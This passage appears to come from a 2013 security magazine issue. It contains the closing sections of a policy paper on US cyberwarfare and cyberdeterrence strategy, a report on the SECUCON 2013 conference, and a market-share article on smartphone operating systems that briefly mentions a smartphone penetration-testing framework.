Countries that are more focused on the survival and welfare of their citizens, and that are largely consumers of Internet and computer capabilities, cannot afford to channel resources into the development of cyberweapons or into the resources required to develop a credible cyberdeterrence strategy. It is also ironic that the U.K., with its stature and status, does not rank higher on the list shown in Figure 2.
Some of the Current Policies Being Employed by These Other States / Regions in Regards to the Threat
China, Russia, and India, each of which is in the top four of the countries listed in Figure 2, have well-defined cyberwarfare policies and strategies. Ironically, the U.S., which occupies the number 2 position in that same ranking, does not yet have well-defined cyberwarfare policies and strategies. For comparison, Table 1 below shows a summary of the policies and strategies of China, Russia and India.
Successes and Failures of the Various Alternative Policies around the Globe
Despite some of the negative press about the Stuxnet virus, this collaborative effort by the U.S. and Israel has been looked at with fascination, and as an event that has quickly and successfully heralded a new age of warfare, the age of cyberwarfare. However, many still feel that the absence of publicly defined policies and strategies by the Obama Administration invites a secretive and even random appearance of, and the continued use of, cyberweapons (Sanger, 2012).
Areas of Joint Communication / Operation / Cooperation that Exist or Should Exist Across Countries Dealing with This Threat Issue
Apparently, the U.S. has already created one or more rather sophisticated cyberweapons with the help of Israeli cyberweapon experts. At least one of these cyberweapons, the Stuxnet Worm, was effectively used to impede the development of Iran’s nuclear material refinement program from 2009 to 2010 (Langer, 2010). It is likely, however, that through the auspices of the United Nations, or perhaps some G20 accord, there may be some general consensus on the importance of defining the appropriate uses of cyberweapons. There also needs to be some agreement on types of response to cyberattacks, and effective methods of cyberdeterrence.

Figure 2. Country Cyber Capabilities Ratings (Technolytics, 2012)
China and Its Role in Cyberwarfare Capabilities
China is probably doing a better job in the realm of cyberwarfare for three reasons: 1) the government has invested considerable resources into their cyberwarfare capabilities; 2) the number of personnel devoted to cyberwarfare efforts is reportedly in the tens of thousands; and 3) the Chinese government is able to easily operate under a cloak of secrecy and conduct operations without fear of cyberwarfare activities being leaked to Chinese press agencies (Hagestad, 2012).
Part 3 Conclusion
This paper has presented a brief strategic comparative analysis of countries with cyberwarfare capability.

Part 4 – Conflict Resolution in Cyberwarfare and Cyberdeterrence
This section will present the ideas of conflict analysis and resolution as they relate to cyberwarfare.
Current Academic Research on This Threat Problem
Since 2007, the existence of well-orchestrated cyberwar attacks such as the DDoS attacks on Estonia (2007), Georgia (2008), and Kyrgyzstan (2009), as well as Stuxnet (2010), Duqu (2011), and Flame (2012), has become known to the world through security researchers, their victims, and the media. As a result, it has become apparent to most who are watching this area that cyberspace has now become the new realm onto which the field of international conflict has been extended, and that cyberwarfare is no longer a theoretical issue that could one day threaten those participants and systems that rely upon connections to the Internet and Internet-connected networks. Unfortunately, however, the present findings and research on cyberwarfare-related events show that the U.S. is playing catch-up and doing so badly (Turanski and Husick, 2012).
Intellectual Positions and Theoretical Explanations That Have Been Staked Out on This Threat Problem
As recently as the 2008 – 2009 timeframe, John Boyd’s conflict model known as Observe – Orient – Decide – Act (OODA) began to be applied to analyze the ideas of “cybernetic warfare” and “net-centric warfare.” The model itself has been analyzed for its ability to simply demonstrate the nature of the complexity of conflict, complete with factors of ambiguity and unpredictability, and so the model has also been used to define the nature of life itself. Yet, the model is also impacted by the chaotic nature of life and reality. The figure further shows the similarity between actual cyberwarfare events and this model. Other characteristics of the OODA loop model are its continuous nature and the feedback loops that provide data on which to base some form (or forms) of decision and action. The OODA Loop model is shown in Figure 3.
Table 1. Summary of Cyberwarfare Policies and Strategies of China, Russia, and India

Country: China
Policy: China supports cyberwarfare capabilities, especially providing such capabilities in the People’s Liberation Army.
Strategy: The Chinese will wage unrestricted warfare, and these are the principles: omni-directionality; synchrony; limited objectives; unlimited measures; asymmetry; minimal consumption; multi-dimensional coordination; adjustment, control of the entire process (Hagestad, 2012).

Country: Russia
Policy: Russia supports cyberwarfare capabilities, especially providing such capabilities in the Russian Army. The nature of cyberwarfare and information warfare requires that the development of a response to these challenges must be organized on an interdisciplinary basis and include researchers from different branches – political analysts, sociologists, psychologists, military specialists, and media representatives (Fayutkin, 2012).
Strategy: The ability to achieve cyber superiority is essential to victory in cyberspace (Fayutkin, 2012).

Country: India
Policy: India supports cyberwarfare capabilities, especially providing such capabilities in the Indian Army. “It is essential for efficient and effective conduct of war including cyber-war. The war book therefore needs to specify how to maintain no-contact cyber war and, when the government decides to go for full-contact or partial-contact war, then how cyber war will be integrated to meet overall war objectives (Saini, 2012).”
Strategy: Strategies are still under development, but will follow the guidance of policies related to the conduct of war (Saini, 2012).
However, one key distinction between Boyd’s OODA model and cybernetic warfare is Boyd’s “focus on the conditions of emergence transformation of systems through information rather than merely the manner in which information is processed by a fixed organizational schema.” Boyd would argue that Claude Shannon and others tend to overemphasize the view of information related to structure as opposed to information as a process (Bousquet, 2009).
Joint Publication (JP) 5-0, Joint Operation Planning
As recently as December 2006, the Joint Chiefs of Staff provided an inside look into how the U.S. National War Plan was created and maintained, in the document titled Joint Publication (JP) 5-0, Joint Operation Planning. While this publicly available, 264-page document is unclassified, it does provide an extraordinary look into the strategic military thinking, principles, and guidance of the Joint Chiefs of Staff and the National Command Authorities as they create policies and strategies that enforce the national strategic objectives of the United States. This document, which was created during the Bush administration, is also significant because it is one of the first official, publicly known such documents that included cyberspace as part of the operational realm of conflict, along with air, sea, land, and space, for conducting military operations (U.S. DoD, JCS, 2006). The high-level diagram below shows simply the concept of the inputs and the outputs that lead to understanding the operational environment of conflict, and it compares somewhat to the OODA figure shown earlier (Figure 4).

To further illustrate the intent of the Joint Chiefs of Staff, Figure 5 visually explains the interconnected nature of the realms related to the operational environment of conflict and the nature of the systems analysis required for decision making.

The JCS also described the environment of conflict as a place where simultaneity of operations would occur, and this environment would include the information environment and cyberspace:
“Simultaneity refers to the simultaneous application of military and nonmilitary power against the enemy’s key capabilities and sources of strength. Simultaneity in joint force operations contributes directly to an enemy’s collapse by placing more demands on enemy forces and functions than can be handled. This does not mean that all elements of the joint force are employed with equal priority or that even all elements of the joint force will be employed. It refers specifically to the concept of attacking appropriate enemy forces and functions throughout the OA (across the physical domains and the information environment [which includes cyberspace]) in such a manner as to cause failure of their moral and physical cohesion (U.S. DoD, JCS, 2006).”

Therefore, the JCS also created a Course of Action framework for determining the best courses of action in a conflict environment, and here again, cyberspace is included in that realm of options in which a course of action could and would be developed (U.S. DoD, JCS, 2006) (Figure 6).
Figure 3. Boyd’s OODA Loop Model (Bousquet, 2009)
WAR CAMP
54 http://pentestmag.com Page OPEN 05/2013
Options in Conflict
Based on the current state of where the U.S. stands, with the lack of coherent and cohesive policies and strategies incorporated into its National CONOPS Plan, and the potential for unintended consequences where the unilateral use of cyberweapons can and will occur, I see three possible options for the U.S., and each of these options has advantages and disadvantages (Table 2).
Part 4 Conclusion
This section has presented a brief look at the U.S. Military’s recognition of cyberspace as an extension of the operational environment of conflict, and a comparison of the options that exist for resolving the issues that threaten America’s ability to create the coherent and cohesive policies and strategies that will define its ability to effectively conduct cyberwarfare and cyberdeterrence in the future.
Part 5 – Policy Generation Related to Cyberwarfare and Cyberdeterrence
This section will present the ideas for the creation of national policy, or the enhancement of existing national policy, related to cyberwarfare and cyberdeterrence issues.
Current U.S. Policy Covering Cyberwarfare Threats
As stated earlier in Part 2 – Policy Analysis, the current written policy related to cyberwarfare threats can be found in President Obama’s Defense Strategic Guidance 2012, a 16-page policy document that was published on January 3, 2012. It has already been noted that this policy has not been effective in deterring cyberattacks and other acts of cyberwar.
Figure 4. Understanding the Operational Environment (U.S. DoD, JCS, 2006)
Figure 5. Understanding the Interconnected Nature of the Realms Related to the Operational Environment of Conflict and the Nature of the Systems Analysis Required for Decision Making (U.S. DoD, JCS, 2006)
Challenges Related to Cyberwar and Cyberdeterrence Policy and Strategy Creation
The creation of policies and strategies related to cyberwar and cyberdeterrence is complicated by six major issues:
1. The lack of international definition and agreement on what constitutes an act of cyberwar (Markoff and Kramer, 2009).
2. The lack of the ability to clearly attribute the source of an attack (Turzanski and Husick, 2012).
3. The ability of non-state actors to conduct potent cyberattacks (Turzanski and Husick, 2012).
4. The inability to clearly define the exact nature of critical infrastructure targets (Turzanski and Husick, 2012).
5. The massive proliferation of, and reliance on, ubiquitous, highly insecure, vulnerable systems based on SCADA technologies from the 1980s and 1990s (Turzanski and Husick, 2012).
6. The continually changing landscape of information technology, including the vulnerabilities and threats related to systems that are obsolete, yet remain in operational use for several years past their intended useful life.
A Single Integrated Operational Plan for War
During the 1950s and 1960s, when it became evident that nuclear weapons could play a major role in strategic warfare, the United States utilized a think-tank of individuals, both military and civilian, to craft the strategic war-fighting plans of the U.S. that would deal with the very real possibility that tactical and possibly strategic nuclear weapons might be required during a major wartime scenario. The first such war plan was called the Single Integrated Operational Plan (SIOP). The process of its creation involved the use of intelligence data about potential enemies, a threat assessment process, and then a process whereby the identified likely targets would be prioritized and matched with weapons. The process of matching weapons to targets also included intricate sequence timings and the various event triggers that would result in the execution of such attacks. In the 1980s, the SIOP evolved into something called the OPSPLAN and later it was renamed the CONOPS Plan, but it has always been kept up to date and tested at least semiannually so that all involved would know their roles if the national command authorities deemed it necessary to execute this intricate war plan (Freedman, 2003). Note that as far back as the 1970s, there were 24 defined levels of conflict between the U.S. and a potential adversary, ranging from a war of words all the way to strategic nuclear war. No matter what its name was, the national war plan has always been a key tool of the national command authorities for understanding what military responses would be required in the event of these various levels of conflict.
Figure 6. Course of Action Development (U.S. DoD, JCS, 2006)
Recommendations for the U.S. Cyberwarfare Policy and Strategy
It is not unreasonable to assume that the path towards a coherent and cohesive U.S. policy and set of strategies regarding the use of cyberweapons will follow a path that is similar to the strategic war plan maturity path from Hiroshima to the SIOP. Today, in the absence of any clear policy on the use of cyberweapons, Crosston advocates agreement on a policy of “Mutually Assured Debilitation”, in which everyone with cyberweapons would come to a general understanding that the use of these weapons would result in the expectation that massive destruction would be unleashed on every participant’s assets (Crosston, 2011). This makes perfect sense considering that the “Mutually Assured Destruction” nuclear deterrence policy was effective and worked well during the Cold War from the 1950s through the 1990s.
Yet, today, I believe that once a coherent and cohesive U.S. policy on cyberwarfare and cyberweapons is defined by the National Command Authorities, there should be an eight-step process that could result in the development and rapid maturation of a strong national strategy for U.S. cyberwarfare:
1. Define the doctrines and principles related to cyberwarfare and the needs under which cyberwarfare would be conducted.
2. Create the policies that embody these doctrines and principles.
3. Conduct the intelligence gathering to accurately understand the landscape of the cyber battlefield.
4. Perform the analysis to create the strategy.
5. Create the strategic plan and tactics.
6. Conduct regular war games, at least twice yearly, to test the strategic plan and tactics.
7. Analyze and document the results of the cyberwarfare war games.
8. Refine the strategies and tactics for cyberwarfare and cyberdeterrence based on the results of analyzing the outcomes of the cyberwarfare war games.
Note that it is also essential to continually assess the capabilities of Information Technology so that the tools our cyberwarfare fighters are using are state of the art, and that they are effective and perform well as they are integrated into the cyberwar war-fighting environment.
Recommendations for the U.S. Cyberdeterrence Policy and Strategy
A strongly worded, explicit U.S. national policy regarding cyberdeterrence would serve to further strengthen the U.S. in cyberspace as well as protect critical infrastructure and our allies. According to a 1997 paper that was prepared by the U.S. Army for the Clinton administration, Toward Deterrence in the Cyber Dimension, these would be the recommended elements of such a policy:
1. Continue to design, create, possess, and use offensive cyber warfare capabilities when necessary.
2. Develop a defensive system for surveillance, assessment, and warning of a cyber attack. (I think such a capability presently exists.)
3. A declaration that any act of deliberate information warfare resulting in the loss of life or significant destruction of property will be met with a devastating response (U.S. Army, 1997).
4. I would also include Crosston’s idea of Mutually Assured Debilitation (Crosston, 2011).
Table 2. Comparing Options for Incorporating Cyberwar and Cyberdeterrence Policies and Strategies into the U.S. National CONOPS Plan
• Option 1 – Create policies that mandate the inclusion of cyberwarfare and cyberdeterrence in the U.S. National CONOPS Plan. Advantage: prevents unintended consequences of unilateral or unplanned use of cyberweapons. Disadvantage: takes time, politics, skills, knowledge, and money.
• Option 2 – Limited creation and application of policies that mandate the inclusion of cyberwarfare and cyberdeterrence in the U.S. National CONOPS Plan. Advantage: prevents some possible unintended consequences of unilateral or unplanned use of cyberweapons. Disadvantage: still requires some time, political wrangling, skills, knowledge, and money.
• Option 3 – Do nothing whatsoever related to cyberweapons and the U.S. National CONOPS Plan; just continue the present trend of conducting cyberwarfare operations on an ad hoc basis in secrecy, and allow the situation with current cyberwarfare threats to continue (Sanger, 2012). Advantage: saves time, political wrangling, and money. Disadvantage: unintended consequences of unilateral or unplanned use of cyberweapons.
Final Thoughts on the Creation of a National Policy on Cyberwar and Cyberdeterrence
According to Kramer, the table below contains the 10-step remedy for creating a policy that would protect the U.S. in cyberspace.
Table 3. A 10-step Remedy toward the Creation of National Policy (Kramer, et al, 2009)
• Unify Policy Direction: Effective policies will not be created by a single person or entity; they require centralized leadership to unify their direction and intent.
• Specialize Policy Direction: Recognizing that one size does not fit all, specialized policies need to be created for various infrastructures and industries to ensure maximum protection.
• Strengthen and Unify Regulation: Regulations must be strengthened to be more effective, or new, more effective regulations must be created.
• Define State and Local Roles: A workable Federal policy must have the involvement of state and local authorities to be effective.
• Define International Interfaces: This is required because cyberspace is connected internationally and because there is still a lack of international agreement on many aspects of cyberwar.
• Mandate Effective Systems Engineering for Infrastructure-related Software: Ensure that there is a realization of and commitment to the need for higher minimum standards for the quality of software that is related to infrastructure.
• Don’t Take No for an Answer: Ensure that stakeholders and those responsible realize the resolute, unwavering commitment toward a workable policy solution.
• Establish and Implement Clear Priorities: This will ensure the best allocation of financial and management resources.
• Inform the Public Clearly and Accurately: The public needs to understand the efforts being made to protect the U.S.
• Conduct a Continuing Program of Research: Keep the policy updated and relevant to changing technologies.
Part 5 Conclusion
This section has presented a brief look at the importance of creating a set of publicly available, coherent and cohesive national policies and strategies that will facilitate U.S. capabilities to effectively conduct cyberwarfare and cyberdeterrence operations now and in the future. At the present moment, the lack of such policies effectively represents a window of risk and uncertainty during a time when cyber threats and cyber attacks are growing at an exponential rate. This has the elements of a real potential for a cyber disaster if this weak policy situation is not resolved as soon as possible. Here, I presented a set of processes and a framework by which the U.S. can quickly address the national challenges of effectively creating the urgently needed national policies and integrated strategies for conducting cyberwarfare and cyberdeterrence operations now and in the future.
Conclusion
This paper has presented a brief look at the importance of creating a clear set of publicly available, coherent and cohesive national policy. It then advocated the incorporation into the U.S. CONOPS Plan of strategies that will address U.S. intentions and capabilities to effectively conduct cyberwarfare and cyberdeterrence operations now and in the future.
References
• Bousquet, A. (2009). The Scientific Way of Warfare: Order and Chaos on the Battlefields of Modernity. New York, NY: Columbia University Press.
• Bush, G. W. (2008). Comprehensive National Cybersecurity Initiative (CNCI). Published by the White House January 2008. Retrieved from http://www.whitehouse.gov/cybersecurity/comprehensive-national-cybersecurity-initiative on January 5, 2012.
• Carr, J. (2012). Inside Cyber Warfare, second edition. Sebastopol, CA: O’Reilly.
• Clarke, R. A. and Knake, R. K. (2010). Cyberwar: the Next Threat to National Security and What to Do About It. New York, NY: HarperCollins Publishers.
• Crosston, M. (2011). World Gone Cyber MAD: How “Mutually Assured Debilitation” Is the Best Hope for Cyber Deterrence. An article published in the Strategic Studies Quarterly, Spring 2011. Retrieved from http://www.au.af.mil/au/ssq/2011/spring/crosston.pdf on October 10, 2012.
• Czosseck, C. and Geers, K. (2009). The Virtual Battlefield: Perspectives on Cyber Warfare. Washington, DC: IOS Press.
• Edwards, M. and Stauffer, T. (2008). Control System Security Assessments. A technical paper presented at the 2008 Automation Summit – A Users Conference, in Chicago. Retrieved from http://www.infracritical.com/papers/nstb-2481.pdf on December 20, 2011.
• Fayutkin, D. (2012). The American and Russian Approaches to Cyber Challenges. Defence Force Officer, Israel. Retrieved from http://omicsgroup.org/journals/2167-0374/2167-0374-2-110.pdf on September 30, 2012.
• Freedman, L. (2003). The Evolution of Nuclear Strategy. New York, NY: Palgrave Macmillan.
• Gerwitz, D. (2011). The Obama Cyberdoctrine: tweet softly, but carry a big stick. An article published at Zdnet.com on May 17, 2011. Retrieved from http://www.zdnet.com/blog/government/the-obama-cyberdoctrine-tweet-softly-but-carry-a-big-stick/10400 on September 25, 2012.
• Gjelten, T. (2010). Are ‘Stuxnet’ Worm Attacks Cyberwarfare? An article published at NPR.org on October 1, 2011. Retrieved from http://www.npr.org/2011/09/26/140789306/security-expert-u-s-leading-force-behind-stuxnet on December 20, 2011.
• Gjelten, T. (2010). Stuxnet Computer Worm Has Vast Repercussions. An article published at NPR.org on October 1, 2011. Retrieved from http://www.npr.org/templates/story/story.php?storyId=130260413 on December 20, 2011.
• Gjelten, T. (2011). Security Expert: U.S. ‘Leading Force’ Behind Stuxnet. An article published at NPR.org on September 26, 2011. Retrieved from http://www.npr.org/2011/09/26/140789306/security-expert-u-s-leading-force-behind-stuxnet on December 20, 2011.
• Gjelten, T. (2011). Stuxnet Raises ‘Blowback’ Risk In Cyberwar. An article published at NPR.org on December 11, 2011. Retrieved from http://www.npr.org/2011/11/02/141908180/stuxnet-raises-blowback-risk-in-cyberwar on December 20, 2011.
• Hagestad, W. T. (2012). 21st Century Chinese Cyberwarfare. Cambridgeshire, U.K.: IT Governance.
• Hyacinthe, B. P. (2009). Cyber Warriors at War: U.S. National Security Secrets & Fears Revealed. Bloomington, IN: Xlibris Corporation.
• Jaquith, A. (2007). Security Metrics. Boston, MA: Addison Wesley.
• Kaplan, F. (1983). The Wizards of Armageddon: The Untold Story of a Small Group of Men Who Have Devised the Plans and Shaped the Policies on How to Use the Bomb. Stanford, CA: Stanford University Press.
• Kerr, D. (2012). Senator urges Obama to issue ‘cybersecurity’ executive order. An article published at Cnet.com on September 24, 2012. Retrieved from http://news.cnet.com/8301-1009_3-57519484-83/senator-urges-obama-to-issue-cybersecurity-executive-order/ on September 26, 2012.
• Kramer, F. D. (ed.), et al. (2009). Cyberpower and National Security. Washington, DC: National Defense University.
• Langner, R. (2010). A Detailed Analysis of the Stuxnet Worm. Retrieved from http://www.langner.com/en/blog/page/6/ on December 20, 2011.
• Libicki, M. C. (2009). Cyberdeterrence and Cyberwar. Santa Monica, CA: Rand Corporation.
• Markoff, J. and Kramer, A. E. (2009). U.S. and Russia Differ on a Treaty for Cyberspace. An article published in the New York Times on June 28, 2009. Retrieved from http://www.nytimes.com/2009/06/28/world/28cyber.html?pagewanted=all on June 28, 2009.
• Mayday, M. (2012). Iran Attacks US Banks in Cyber War: Attacks target three major banks, using Muslim outrage as cover. An article published on September 22, 2012 at Politix.Topix.com. Retrieved from http://politix.topix.com/homepage/2214-iran-attacks-us-banks-in-cyber-war on September 22, 2012.
• McBrie, J. M. (2007). The Bush Doctrine: Shifting Position and Closing the Stance. A scholarly paper published by the USAWC Strategy Research Project. Retrieved from http://www.dtic.mil/cgi-bin/GetTRDoc?AD=ADA423774 on September 30, 2012.
• Obama, B. H. (2012). Defense Strategic Guidance 2012 – Sustaining Global Leadership: Priorities for 21st Century Defense. Published January 3, 2012. Retrieved from http://www.defense.gov/news/Defense_Strategic_Guidance.pdf on January 5, 2012.
• Obama, B. H. (2011). International Strategy for Cyberspace. Published by the White House on May 16, 2011. Retrieved from http://www.whitehouse.gov/sites/default/files/rss_viewer/international_strategy_for_cyberspace.pdf on May 16, 2011.
• Payne, K. B. (2001). The Fallacies of Cold War Deterrence and a New Direction. Lexington, KY: The University of Kentucky Press.
• Pry, P. V. (1999). War Scare: Russia and America on the Nuclear Brink. Westport, CT: Praeger Publications.
• Radcliff, D. (2012). Cyber cold war: Espionage and warfare. An article published in SC Magazine, September 4, 2012. Retrieved from http://www.scmagazine.com/cyber-cold-war-espionage-and-warfare/article/254627/ on September 7, 2012.
• Saini, M. (2012). Preparing for Cyberwar – A National Perspective. An article published on July 26, 2012 at the Vivekananda International Foundation. Retrieved from http://www.vifindia.org/article/2012/july/26/preparing-for-cyberwar-a-national-perspective on October 14, 2012.
• Sanger, D. E. (2012). Confront and Conceal: Obama’s Secret Wars and Surprising Use of American Power. New York, NY: Crown Publishers.
• Schmidt, H. S. (2006). Patrolling Cyberspace: Lessons Learned from a Lifetime in Data Security. N. Potomac, MD: Larstan Publishing, Inc.
• Schmitt, E. and Shanker, T. (2011). U.S. Debated Cyberwarfare in Attack Plan on Libya. An article published in the New York Times on October 17, 2011. Retrieved from http://www.nytimes.com/2011/10/18/world/africa/cyber-warfare-against-libya-was-debated-by-us.html on October 17, 2011.
• Stiennon, R. (2010). Surviving Cyber War. Lanham, MA: Government Institutes.
• Strohm, C. and Engleman, E. (2012). Cyber Attacks on U.S. Banks Expose Vulnerabilities. An article published at BusinessWeek.com on September 28, 2012. Retrieved from http://www.businessweek.com/news/2012-09-27/cyber-attacks-on-u-dot-s-dot-banks-expose-computer-vulnerability on September 30, 2012.
• Technolytics. (2012). Cyber Commander’s eHandbook: The Weaponry and Strategies of Digital Conflict, third edition. Purchased and downloaded on September 26, 2012.
• Turzanski, E. and Husick, L. (2012). “Why Cyber Pearl Harbor Won’t Be Like Pearl Harbor At All...” A webinar presentation held by the Foreign Policy Research Institute (FPRI) on October 24, 2012. Retrieved from http://www.fpri.org/multimedia/2012/20121024.webinar.cyberwar.html on October 25, 2012.
• U.S. Army. (1997). Toward Deterrence in the Cyber Dimension: A Report to the President’s Commission on Critical Infrastructure Protection. Retrieved from http://www.carlisle.army.mil/DIME/documents/173_PCCIPDeterrenceCyberDimension_97.pdf on November 3, 2012.
• U.S. Department of Defense, JCS. (2006). Joint Publication (JP) 5-0, Joint Operation Planning, updated on December 26, 2012. Retrieved from http://www.dtic.mil/doctrine/new_pubs/jp5_0.pdf on October 25, 2012.
• Waters, G. (2008). Australia and Cyber-Warfare. Canberra, Australia: ANU E Press.
WILLIAM F. SLATER, III
William F. Slater, III is an IT security professional who lives and works in Chicago, IL. He has over 20 security-related certifications, including CISSP, SSCP, and CISA. In March 2013 he completes his M.S. in Cybersecurity Program at Bellevue University in Bellevue, Nebraska. He has written numerous articles on IT Security and Cyberwarfare. Mr. Slater is also an adjunct professor at the Illinois Institute of Technology and the devoted husband of Ms. Joanna Roguska, who is a web developer and a native of Warsaw, Poland. You can read more about Mr. Slater at http://billslater.com/interview.
SECUCON 2013
SECUCON 2013 was a conference hosted by SECUGENIUS, a unit of HARKSH Technologies Pvt Ltd, at GGNIMT, Ludhiana, with a vision to create awareness of the need for security in social life and to spread a message of generating opportunities in the same field. Two young entrepreneurs, Er. Harpreet Khattar and Er. Kshitij Adhlakha, started this venture to provide specialized opportunities to the most technical species on this earth. They authored a book named 'Security Breached', which was launched on the same day by the Chief Guest of the event, Mr. Mahesh Inder Grewal, Advisor to the CM of Punjab, along with Mr. A.S. Rai, Inspector General Punjab, and Dr. Maninder Singh, Head of the Computer Department, Thapar University Patiala.
The session was inaugurated by Chief Guest Mr. Mahesh Inder Grewal with an enlightening speech on the use of security in society and the launch of the book 'Security Breached', authored by Er. Harpreet Khattar and Er. Kshitij Adhlakha. Harpreet Khattar told how he started his company, SECUGENIUS and Harksh Technologies. As a team with his partner Kshitij Adhlakha, they wanted to do something to support the careers of young people and to steer them into the upcoming field of Information Security. He discussed the platforms and opportunities provided by the government for the effective use and utilization of resources and studies in the security domain, followed by Kshitij Adhlakha and the other esteemed speakers of the conference, which generated great enthusiasm for security among the audience. The audience gained a view of what lies ahead through the in-depth knowledge of speakers from three countries on the most technical and social fields of IT Security and on curbing hacking in society. Following is the list of speakers at the conference:
1. Er. Harpreet Khattar
2. Er. Kshitij Adhlakha
3. Dr. Maninder Singh
4. Mr. A.S. Rai
5. Dr. S.N Panda
6. Dr. M.S. Pabla
7. Ivneet Singh
8. Shenddy Jimenez
9. Nipun Jaswal
10. Shubhamoy Chakarborty
11. Theresa Michael
12. Dr. Parminder Singh
13. Col. Gurinder Singh Saini
14. Kailash D Agarwal
The audience constituted four categories, across four sessions on the two days, 25th and 26th May, 2013:
• Political Dignitaries and Defence Forces Personnel
• Academicians
• Industry CEOs and Community representatives
• Students and Social Communists
The conference was concluded by Dr. Gunwant Singh Dua (Director, GGNIMT) on behalf of SECUGENIUS, in association with GGNIMT, after launching a specialized course for students and professionals at the same venue, which will run for the next two months with the vision that each student participating in this course could earn handsome opportunities in their future endeavours. This conference was organized and managed by SECUGENIUS, a unit of Harksh Technologies Pvt Ltd, in coordination with and with venue support from Gujranwala Guru Nanak Institute of Management & Technology, and was promoted by FTG Solutions. The conference was covered by various newspapers, media and other out-of-station magazines thereafter.
LET'S TALK ABOUT SECURITY
Smartphone: a Win-win Product for Both Consumers and Sellers
In a world where technology can be used for multiple exchanges, the use of mobile phones is no longer limited to simple voice communication functions. Mobiles are now providing access to a growing number of services thanks to the smartphone.
A smartphone is a mobile phone built on a mobile operating system, with more advanced computing capability and connectivity than a feature phone. Nowadays, phones aren’t just for basic needs like talking and texting; they have many advanced features such as internet, email, gaming, organizing, taking photos, playing music, shopping, watching movies and more. These features combined together constitute a smartphone. The building block of any smartphone is its operating system (OS), which manages the hardware and software resources of the device. The smartphone market is among the largest and fastest growing markets in the world of consumer electronics. It is currently dominated by Android and the iPhone, with BlackBerry and Symbian phones at a distant 3rd and 4th position.
Nowadays, smartphones are a basic part of life for every corporate employee. They use smartphone devices to gain access to company credentials and to check company-specific mails and data. Thus security remains a big concern at the workplace, so penetration testing needs to be done on every available aspect whenever it is possible.
Body
Smartphone growth and adoption is increasing rapidly worldwide due to their rich and versatile functionality. The versatility and convenience of these devices gives them priority over other similar devices like PDAs (Personal Digital Assistants) or tablets.
Today, a smartphone is not just used to talk; rather it is utilized for a wide array of services, viz. GPS, MP3 player, a range of entertainment, electronic banking, reading e-books or attending office meetings online. Such a diverse mixture of services can only be delivered with the combination of strong compact hardware and high-speed reliable software with a good operating system.
Smartphone Operating System
Google’s Android platform is expected to have the largest share of the global smartphone operating system market by 2014. Companies making Android devices include Samsung, HTC and Motorola Mobility, which Google owns. Samsung also makes phones running Bada, which is based on Linux. Nokia has traditionally relied on Symbian, but it is banking its future on Windows. Android and iOS combined for 87.6% of the 2012 smartphone market.
As per the shipment numbers, Android had 68% market share of worldwide smartphones in Q2 2012, with iOS a distant second at 16.9%. Despite being down year-on-year, BlackBerry and Symbian came in third and fourth, while Windows Phone, which almost doubled its shipments, only had 3.5% of the Q2 2012 market share (Figure 1).
Samsung is the undisputed leader in the worldwide smartphone market. By the end of 1Q13, Samsung had shipped more units than the next four vendors combined. Apple has held the second spot in the smartphone market. Apple’s mix of models shipped to market is increasingly diversified as it tries to reach new buyers. LG’s smartphone volume for the quarter was driven in large part by its 3G smartphone portfolio, namely the L series and the Nexus 4. LTE-enabled devices, including the Optimus G series, also contributed to its success. LG is anticipated to continue its upward trajectory with the launch of the F and L series targeting the mid-range and entry-level segments. Huawei has shown significant improvement; it has decreased its dependence on rebranded feature phones while growing its Ascend portfolio to address multiple customer segments with more branded smartphone offerings. In 2013, ZTE’s focus is to grow in North America and Europe. In China, where increasing price pressure has challenged vendors to grow profitably, ZTE will emphasize its higher-price products. In addition, ZTE will be among the first companies to launch a Firefox-powered smartphone in 2013 (Figures 2-4).
In today’s fast-paced corporate world, every employee, whether from IT or the top executives, relies on having continuous real-time access to company data. Probably, many employees access their company email and files on their smartphone devices. Companies at present have two alternatives: first, issue company-owned smartphones to employees, or second, let employees bring their own devices to work to be integrated with the network. The security posture of the smartphone in the workplace therefore becomes a critical issue.
Figure 1. Global – Top Smartphone Operating System Market Share (Percent), Quarter 2, 2012. Source: IDC Worldwide Mobile Phone Tracker, August 8, 2012
Figure 2. Global – Top Five Smartphone Vendors, Unit Shipments (Million), Quarter 1, 2013. Source: IDC Worldwide Mobile Phone Tracker, April 25, 2013
Figure 3. Global – Top Five Smartphone Vendors, Market Share (Percent), Quarter 1, 2012. Source: IDC Worldwide Mobile Phone Tracker, April 25, 2013
With the increasing utilization of smartphones in the workplace, sharing the network and accessing sensitive data, it is crucial to be able to assess the security posture of these devices in the same way we perform penetration tests on workstations and servers. However, smartphones have unique attack vectors that are not currently covered by available industry tools. The smartphone penetration testing framework, the result of a DARPA Cyber Fast Track project, aims to provide many facets of assessing the security posture of these devices.
The Smartphone Pentest Framework (SPF) is an open source tool designed to allow users to assess the security posture of the smartphones deployed in an environment. The tool allows for assessment of remote vulnerabilities, client-side attacks, social engineering attacks, post-exploitation and local privilege escalation.
The SPF tool allows users to assess the security of the smartphones in the environment in the manner they’ve come to expect from modern penetration testing tools. SPF is made up of several parts that may be mixed and matched to meet users’ needs:
• SPF Console
• SPF Web-based GUI
• SPF Android App
• SPF Android Agent
Conclusion
The smartphone market share trends point to the fact that Android is the market leader and, going forward, it is expected to be the undisputed leader, with the iPhone as a strong number-two player. Symbian seems to be dying out in terms of consumer mindshare, and Windows Phone is struggling as well to gain market share. The Windows Phone 8 platform is also not gaining much headway at this point. If Microsoft isn’t able to mount a serious push to become relevant as a third platform by 2013, it may open the door to competition from Firefox’s HTML-based smartphone OS.
RAJIV RANJAN
Rajiv Ranjan is working as a Senior Research Analyst with Renub Research. He holds an MBA degree and has more than 5 years of telecom domain experience. For more questions on this article, mention the author name and article title in the subject line and write to us at [email protected].
Figure 4. Global – Top Five Smartphone Vendors, Market Share (Percent), Quarter 1, 2013. Source: IDC Worldwide Mobile Phone Tracker, April 25, 2013
About Us
Renub Research is a leading Management Consultancy and Market Research company with more than 10 years of experience in research, surveys and consulting. We provide a wide range of business research solutions that help companies make better business decisions. We partner with clients in all sectors and regions to identify their highest-value opportunities, address their most critical challenges and transform their businesses.
Our clientele comprises major players in Life Sciences, Information Technology, Telecom, Financial Services (Banking, Insurance), Energy, Retail, Manufacturing, Automotive and the Social sector. Our clients rely on our market analysis and data to make informed decisions. We are regarded as one of the best providers of knowledge, and our pertinent analysis helps consultants, bankers and executives make informed and correct decisions.
A few of our published reports on the Telecom sector
• South Africa Mobile Service Market, Subscribers & Companies Forecast to 2015 http://www.renub.com/report/south-africa-mobile-service-market-subscribers-companies-forecast-to-2015-87
